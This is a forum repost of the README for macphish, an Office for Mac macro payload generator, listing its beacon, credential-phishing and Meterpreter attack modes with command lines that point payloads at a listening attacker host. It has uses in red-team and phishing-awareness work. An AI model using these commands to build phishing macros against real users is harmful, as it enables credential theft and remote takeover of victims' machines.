Jump to content
Nytro

macphish

By Nytro, in Programe hacking

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

macphish

Office for Mac Macro Payload Generator macphish

Attack vectors

There are 4 attack vectors available:

  • beacon
  • creds
  • meterpreter
  • meterpreter-grant

For the 'creds' method, macphish can generate the Applescript script directly, in case you need to run it from a shell.

beacon

On execution, this payload will signal our listening host and provide basic system information about the victim. The simplest way of generating a beacon payload is: 

$./macphish.py -lh <listening host>

By default, it uses curl but other utilities (wget, nslookup) can be used by modifying the command template.

creds 

$./macphish.py -lh <listening host> -lp <listening port> -a creds

meterpreter

The simplest way of generating a meterpreter payload is: 

$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter

meterpreter-grant

The generate a meterpreter payload that calls GrantAccessToMultipleFiles() first: 

$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant

For meterpreter attacks, only python payloads are supported at the moment.

 

Sursa: https://github.com/cldrn/macphish

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...